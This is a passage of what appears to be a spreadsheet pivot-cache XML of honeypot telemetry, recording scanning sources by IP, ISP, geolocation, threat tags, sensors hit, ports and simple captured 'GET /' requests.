    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="202870"/>
    <s v="Dimensione S.r.l."/>
    <s v="Dimensione S.r.l."/>
    <s v="residential"/>
    <s v="DIMENSIONE Srl"/>
    <s v="1996-04-11"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="dns2.dimensione.com_x000a_        dns3.dimensione.com_x000a_        dns1.dimensione.com_x000a__x000a_Please visit www.eurid.eu for more info."/>
    <s v="SeFlow Srl"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c320:46d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3397"/>
    <x v="3397"/>
    <s v="220-135-10-143.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:31:11"/>
    <d v="2024-04-17T17:48:42"/>
    <d v="2025-04-03T07:31:11"/>
    <n v="399"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;889&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;40105&amp;&amp;40124"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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dc87:a8f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3398"/>
    <x v="3398"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:29:35"/>
    <d v="2025-04-03T07:28:52"/>
    <d v="2025-04-03T07:29:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:1819"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3399"/>
    <x v="3399"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:23:08"/>
    <d v="2025-04-03T07:20:14"/>
    <d v="2025-04-03T07:23:08"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="NP"/>
    <s v="Nepal"/>
    <s v="P3"/>
    <s v="Bagmati Province"/>
    <s v="Makwanpur"/>
    <s v="Hetauda"/>
    <s v="1283339"/>
    <s v="NA"/>
    <s v="27.4368"/>
    <s v="85.0026"/>
    <s v="23752"/>
    <s v="Nepal Telecommunications Corporation"/>
    <s v="Nepal Telecommunications Corporation"/>
    <s v="residential"/>
    <s v="Nepal Telecommunications Corporation Cellular Mobile and New Services"/>
    <s v="2010-11-11"/>
    <s v="NTCINTERNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31f4:95a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3400"/>
    <x v="3400"/>
    <s v="122-117-239-244.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:17:23"/>
    <d v="2024-09-02T15:19:00"/>
    <d v="2025-04-03T07:17:23"/>
    <n v="1030"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;23595&amp;&amp;55183&amp;&amp;55212&amp;&amp;55256&amp;&amp;9100"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:eff4"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3401"/>
    <x v="3401"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T07:10:44"/>
    <d v="2025-04-03T07:10:44"/>
    <d v="2025-04-03T07:10:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:ea0c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3402"/>
    <x v="3402"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T06:43:19"/>
    <d v="2025-04-03T06:43:19"/>
    <d v="2025-04-03T06:43:19"/>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3b62:ecd1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3403"/>
    <x v="3403"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T06:30:57"/>
    <d v="2025-04-03T06:23:06"/>
    <d v="2025-04-03T06:30:57"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5d9d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3404"/>
    <x v="3404"/>
    <s v="NA&amp;&amp;59-126-85-114.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T06:21:40"/>
    <d v="2024-03-20T18:55:57"/>
    <d v="2025-04-03T06:21:40"/>
    <n v="725"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;16231&amp;&amp;17964&amp;&amp;50348&amp;&amp;80&amp;&amp;33548&amp;&amp;9100&amp;&amp;50299&amp;&amp;NA"/>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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:5572"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3405"/>
    <x v="3405"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T06:19:46"/>
    <d v="2025-04-03T06:19:46"/>
    <d v="2025-04-03T06:19:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AF"/>
    <s v="Afghanistan"/>
    <s v="HER"/>
    <s v="Herat"/>
    <s v="Herat District"/>
    <s v="Herat"/>
    <s v="1140026"/>
    <s v="NA"/>
    <s v="34.3482"/>
    <s v="62.1997"/>
    <s v="55330"/>
    <s v="GCN-DCN-AS"/>
    <s v="DSL Broadband Network Herat"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af6a:25b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3406"/>
    <x v="3406"/>
    <s v="NA&amp;&amp;125-228-160-16.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T06:08:59"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-03T06:08:59"/>
    <n v="401"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;36688&amp;&amp;4877"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:a010"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3407"/>
    <x v="3407"/>
    <s v="125-228-64-4.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T06:07:34"/>
    <d v="2023-12-24T16:54:31"/>
    <d v="2025-04-03T06:07:34"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;27456&amp;&amp;23&amp;&amp;9100&amp;&amp;47376&amp;&amp;53829&amp;&amp;53851&amp;&amp;80"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:4004"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3408"/>
    <x v="3408"/>
    <s v="dsl51B6F86B.fixip.t-online.hu&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T06:04:44"/>
    <d v="2025-03-12T12:45:48"/>
    <d v="2025-04-03T06:04:44"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTP_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="37215&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="HU"/>
    <s v="Hungary"/>
    <s v="BU"/>
    <s v="Budapest"/>
    <s v="NA"/>
    <s v="Budapest (XI. kerület)"/>
    <s v="3054643"/>
    <s v="1117"/>
    <s v="47.4744"/>
    <s v="19.0486"/>
    <s v="5483"/>
    <s v="Magyar Telekom plc."/>
    <s v="Hungarian Telecom"/>
    <s v="residential"/>
    <s v="Axelero Co"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;POST"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:51b6:f86b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3409"/>
    <x v="3409"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T06:01:31"/>
    <d v="2025-04-03T01:23:50"/>
    <d v="2025-04-03T06:01:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2010-02-24"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63b:c93d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3410"/>
    <x v="3410"/>
    <s v="st0170.nas811.p-akita.nttpc.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T05:51:34"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T05:51:34"/>
